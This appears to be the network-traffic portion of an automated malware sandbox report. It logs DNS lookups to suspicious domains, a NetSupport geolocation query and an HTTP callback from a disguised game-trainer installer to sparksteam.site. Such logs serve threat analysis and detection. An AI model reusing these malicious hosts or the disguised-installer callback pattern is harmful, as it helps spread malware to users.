                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613738060 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613743067 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613776922 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613782883 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613814116 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613822937 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613851070 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613859892 CET4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:22.613889933 CET8049730159.223.29.40192.168.2.5
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.202003956 CET192.168.2.51.1.1.10x64f5Standard query (0)sparksteam.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.320431948 CET192.168.2.51.1.1.10x4697Standard query (0)sidemark.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.133460999 CET192.168.2.51.1.1.10xf9b6Standard query (0)false.apparelsilver.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.182564020 CET192.168.2.51.1.1.10xed20Standard query (0)www.agenment.cloudA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:17.925205946 CET192.168.2.51.1.1.10xd005Standard query (0)myptofgrtulo.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.073877096 CET192.168.2.51.1.1.10x2f1Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.342009068 CET192.168.2.51.1.1.10x8f32Standard query (0)axsboe-campaign.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.342268944 CET192.168.2.51.1.1.10xddb9Standard query (0)axsboe-campaign.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.409605980 CET192.168.2.51.1.1.10xd633Standard query (0)clients2.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.409925938 CET192.168.2.51.1.1.10xfe16Standard query (0)clients2.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.410706997 CET192.168.2.51.1.1.10x8112Standard query (0)accounts.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.410965919 CET192.168.2.51.1.1.10x2862Standard query (0)accounts.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.717430115 CET192.168.2.51.1.1.10x9ee6Standard query (0)send.planewool.xyzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.023643017 CET192.168.2.51.1.1.10xa195Standard query (0)kapetownlink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.263468027 CET192.168.2.51.1.1.10xe59dStandard query (0)aefd.nelreports.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.263768911 CET192.168.2.51.1.1.10xc620Standard query (0)aefd.nelreports.net65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.748706102 CET192.168.2.51.1.1.10x2cddStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.748893023 CET192.168.2.51.1.1.10xe605Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.257385015 CET192.168.2.51.1.1.10x474cStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.257742882 CET192.168.2.51.1.1.10x97d6Standard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.390867949 CET192.168.2.51.1.1.10xfd3eStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.391132116 CET192.168.2.51.1.1.10xdb2aStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.783134937 CET192.168.2.51.1.1.10x2d65Standard query (0)www.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.783510923 CET192.168.2.51.1.1.10x5da6Standard query (0)www.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:26.634099960 CET192.168.2.51.1.1.10x25caStandard query (0)www.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:26.634325027 CET192.168.2.51.1.1.10xb637Standard query (0)www.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.426584959 CET192.168.2.51.1.1.10x6c83Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.426903009 CET192.168.2.51.1.1.10xe195Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.514034033 CET192.168.2.51.1.1.10x1023Standard query (0)browser.events.data.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.514341116 CET192.168.2.51.1.1.10x538eStandard query (0)browser.events.data.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:32.286326885 CET192.168.2.51.1.1.10x6362Standard query (0)assets.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:32.286545992 CET192.168.2.51.1.1.10x5bddStandard query (0)assets.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:33.375530005 CET192.168.2.51.1.1.10xe380Standard query (0)c.msn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:33.375886917 CET192.168.2.51.1.1.10x9d76Standard query (0)c.msn.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:37.974241972 CET192.168.2.51.1.1.10xaa37Standard query (0)ecn.dev.virtualearth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:37.974479914 CET192.168.2.51.1.1.10x7d4Standard query (0)ecn.dev.virtualearth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:38.792800903 CET192.168.2.51.1.1.10x8bb5Standard query (0)ecn.dev.virtualearth.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:38.793090105 CET192.168.2.51.1.1.10xcdcfStandard query (0)ecn.dev.virtualearth.net65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.230685949 CET192.168.2.51.1.1.10xbc1Standard query (0)pstbbk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.231300116 CET192.168.2.51.1.1.10x8443Standard query (0)collect.installeranalytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.522186995 CET192.168.2.51.1.1.10xac67Standard query (0)allroadslimit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.000662088 CET192.168.2.51.1.1.10x244fStandard query (0)231005002055611.bcn.lca62.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.498950005 CET192.168.2.51.1.1.10xd231Standard query (0)ambadevgroup.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.533335924 CET192.168.2.51.1.1.10x5a7aStandard query (0)dl.likeasurfer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:03.421499014 CET192.168.2.51.1.1.10x6caaStandard query (0)111.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.097946882 CET192.168.2.51.1.1.10x5072Standard query (0)114.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.624293089 CET192.168.2.51.1.1.10x359dStandard query (0)113.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.767713070 CET192.168.2.51.1.1.10xf59aStandard query (0)112.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.797346115 CET192.168.2.51.1.1.10x10d8Standard query (0)110.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:08.534789085 CET192.168.2.51.1.1.10x43d6Standard query (0)111.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.203743935 CET192.168.2.51.1.1.10x1bcStandard query (0)114.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.730432034 CET192.168.2.51.1.1.10x9721Standard query (0)113.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.873585939 CET192.168.2.51.1.1.10xba0fStandard query (0)112.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.921086073 CET192.168.2.51.1.1.10xa845Standard query (0)110.t.keepitpumpin.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.763995886 CET192.168.2.51.1.1.10x890eStandard query (0)clients1.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.764190912 CET192.168.2.51.1.1.10x32f0Standard query (0)clients1.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.460052967 CET1.1.1.1192.168.2.50x64f5No error (0)sparksteam.site104.21.52.223A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.460052967 CET1.1.1.1192.168.2.50x64f5No error (0)sparksteam.site172.67.204.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.425113916 CET1.1.1.1192.168.2.50x4697No error (0)sidemark.xyz104.21.73.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.425113916 CET1.1.1.1192.168.2.50x4697No error (0)sidemark.xyz172.67.165.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.234751940 CET1.1.1.1192.168.2.50xf9b6No error (0)false.apparelsilver.xyz172.67.198.151A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:07.234751940 CET1.1.1.1192.168.2.50xf9b6No error (0)false.apparelsilver.xyz104.21.13.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:08.319574118 CET1.1.1.1192.168.2.50xed20No error (0)www.agenment.cloud185.23.108.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.096036911 CET1.1.1.1192.168.2.50xd005No error (0)myptofgrtulo.info95.142.47.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.176599979 CET1.1.1.1192.168.2.50x2f1No error (0)geo.netsupportsoftware.com51.142.119.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.176599979 CET1.1.1.1192.168.2.50x2f1No error (0)geo.netsupportsoftware.com62.172.138.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:18.176599979 CET1.1.1.1192.168.2.50x2f1No error (0)geo.netsupportsoftware.com62.172.138.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.499531031 CET1.1.1.1192.168.2.50xddb9No error (0)axsboe-campaign.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.504555941 CET1.1.1.1192.168.2.50xd633No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.504555941 CET1.1.1.1192.168.2.50xd633No error (0)clients.l.google.com142.251.111.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.504555941 CET1.1.1.1192.168.2.50xd633No error (0)clients.l.google.com142.251.111.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.504555941 CET1.1.1.1192.168.2.50xd633No error (0)clients.l.google.com142.251.111.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.504555941 CET1.1.1.1192.168.2.50xd633No error (0)clients.l.google.com142.251.111.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.504555941 CET1.1.1.1192.168.2.50xd633No error (0)clients.l.google.com142.251.111.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.504555941 CET1.1.1.1192.168.2.50xd633No error (0)clients.l.google.com142.251.111.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.505215883 CET1.1.1.1192.168.2.50xfe16No error (0)clients2.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.505743980 CET1.1.1.1192.168.2.50x8112No error (0)accounts.google.com172.253.115.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.513467073 CET1.1.1.1192.168.2.50x8f32No error (0)axsboe-campaign.com172.67.213.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.513467073 CET1.1.1.1192.168.2.50x8f32No error (0)axsboe-campaign.com104.21.37.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.820151091 CET1.1.1.1192.168.2.50x9ee6No error (0)send.planewool.xyz104.21.90.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:19.820151091 CET1.1.1.1192.168.2.50x9ee6No error (0)send.planewool.xyz172.67.157.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.122421026 CET1.1.1.1192.168.2.50xa195No error (0)kapetownlink.com159.223.29.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.358040094 CET1.1.1.1192.168.2.50xe59dNo error (0)aefd.nelreports.netaefd.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:21.358808041 CET1.1.1.1192.168.2.50xc620No error (0)aefd.nelreports.netaefd.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.844010115 CET1.1.1.1192.168.2.50xe605No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.844444036 CET1.1.1.1192.168.2.50x2cddNo error (0)www.google.com172.253.63.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.844444036 CET1.1.1.1192.168.2.50x2cddNo error (0)www.google.com172.253.63.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.844444036 CET1.1.1.1192.168.2.50x2cddNo error (0)www.google.com172.253.63.147A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.844444036 CET1.1.1.1192.168.2.50x2cddNo error (0)www.google.com172.253.63.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.844444036 CET1.1.1.1192.168.2.50x2cddNo error (0)www.google.com172.253.63.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:23.844444036 CET1.1.1.1192.168.2.50x2cddNo error (0)www.google.com172.253.63.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.352593899 CET1.1.1.1192.168.2.50x97d6No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.353029013 CET1.1.1.1192.168.2.50x474cNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.485702991 CET1.1.1.1192.168.2.50xdb2aNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.485771894 CET1.1.1.1192.168.2.50xfd3eNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.878160000 CET1.1.1.1192.168.2.50x2d65No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:25.878644943 CET1.1.1.1192.168.2.50x5da6No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:26.729237080 CET1.1.1.1192.168.2.50x25caNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:26.729521036 CET1.1.1.1192.168.2.50xb637No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:27.071861982 CET1.1.1.1192.168.2.50x7af2No error (0)shed.dual-low.part-0012.t-0009.t-msedge.netpart-0012.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:27.071861982 CET1.1.1.1192.168.2.50x7af2No error (0)part-0012.t-0009.t-msedge.net13.107.246.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:27.071861982 CET1.1.1.1192.168.2.50x7af2No error (0)part-0012.t-0009.t-msedge.net13.107.213.40A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.521747112 CET1.1.1.1192.168.2.50x6c83No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.522874117 CET1.1.1.1192.168.2.50xe195No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.609038115 CET1.1.1.1192.168.2.50x538eNo error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:31.609668970 CET1.1.1.1192.168.2.50x1023No error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:32.381380081 CET1.1.1.1192.168.2.50x5bddNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:32.381810904 CET1.1.1.1192.168.2.50x6362No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:33.470432043 CET1.1.1.1192.168.2.50xe380No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:33.471827030 CET1.1.1.1192.168.2.50x9d76No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:38.069410086 CET1.1.1.1192.168.2.50xaa37No error (0)ecn.dev.virtualearth.netssl2.tiles.virtualearth.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:38.069978952 CET1.1.1.1192.168.2.50x7d4No error (0)ecn.dev.virtualearth.netssl2.tiles.virtualearth.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:38.887682915 CET1.1.1.1192.168.2.50x8bb5No error (0)ecn.dev.virtualearth.netssl2.tiles.virtualearth.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:38.888761997 CET1.1.1.1192.168.2.50xcdcfNo error (0)ecn.dev.virtualearth.netssl2.tiles.virtualearth.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.334212065 CET1.1.1.1192.168.2.50xbc1No error (0)pstbbk.com157.230.96.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.350100040 CET1.1.1.1192.168.2.50x8443No error (0)collect.installeranalytics.com54.165.38.232A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.350100040 CET1.1.1.1192.168.2.50x8443No error (0)collect.installeranalytics.com54.165.145.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.680780888 CET1.1.1.1192.168.2.50xac67No error (0)allroadslimit.com104.21.74.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:41.680780888 CET1.1.1.1192.168.2.50xac67No error (0)allroadslimit.com172.67.157.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.486519098 CET1.1.1.1192.168.2.50x244fServer failure (2)231005002055611.bcn.lca62.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.599749088 CET1.1.1.1192.168.2.50xd231No error (0)ambadevgroup.info37.1.198.251A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.689573050 CET1.1.1.1192.168.2.50x5a7aNo error (0)dl.likeasurfer.com104.21.32.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:44.689573050 CET1.1.1.1192.168.2.50x5a7aNo error (0)dl.likeasurfer.com172.67.150.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:03.516784906 CET1.1.1.1192.168.2.50x6caaName error (3)111.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.193536043 CET1.1.1.1192.168.2.50x5072Name error (3)114.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.248850107 CET1.1.1.1192.168.2.50x7bf0Name error (3)115.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.720877886 CET1.1.1.1192.168.2.50x359dName error (3)113.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.863791943 CET1.1.1.1192.168.2.50xf59aName error (3)112.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:04.911576033 CET1.1.1.1192.168.2.50x10d8Name error (3)110.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:08.630311012 CET1.1.1.1192.168.2.50x43d6Name error (3)111.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.300792933 CET1.1.1.1192.168.2.50x1bcName error (3)114.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.349328041 CET1.1.1.1192.168.2.50xc9abName error (3)115.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.828716040 CET1.1.1.1192.168.2.50x9721Name error (3)113.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:09.969491005 CET1.1.1.1192.168.2.50xba0fName error (3)112.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:10.017132998 CET1.1.1.1192.168.2.50xa845Name error (3)110.t.keepitpumpin.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859433889 CET1.1.1.1192.168.2.50x890eNo error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859433889 CET1.1.1.1192.168.2.50x890eNo error (0)clients.l.google.com142.251.16.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859433889 CET1.1.1.1192.168.2.50x890eNo error (0)clients.l.google.com142.251.16.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859433889 CET1.1.1.1192.168.2.50x890eNo error (0)clients.l.google.com142.251.16.139A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859433889 CET1.1.1.1192.168.2.50x890eNo error (0)clients.l.google.com142.251.16.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859433889 CET1.1.1.1192.168.2.50x890eNo error (0)clients.l.google.com142.251.16.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859433889 CET1.1.1.1192.168.2.50x890eNo error (0)clients.l.google.com142.251.16.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:34:48.859795094 CET1.1.1.1192.168.2.50x32f0No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        0192.168.2.549705104.21.52.223805240C:\Users\user\AppData\Local\Temp\is-P5SF5.tmp\ZmWSzgevgt.tmp
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.564606905 CET267OUTGET /ill.php?p=3890&t=47670100&title=cml2ZXItY2l0eS1yaXZhbC1zaG93ZG93bi10cmFpbmVyLTE1LXYxLTgtLmV4ZQ==&sub=&ps=655ed8e14a15c HTTP/1.1
                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                        User-Agent: Inno Setup 6.2.2
                                                                                                                                                                                                                                                                        Host: sparksteam.site
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.209007978 CET916INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Wed, 06 Dec 2023 13:33:01 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Content-Length: 152
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                        Cache-Control: no-transform, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Expires: Sat, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
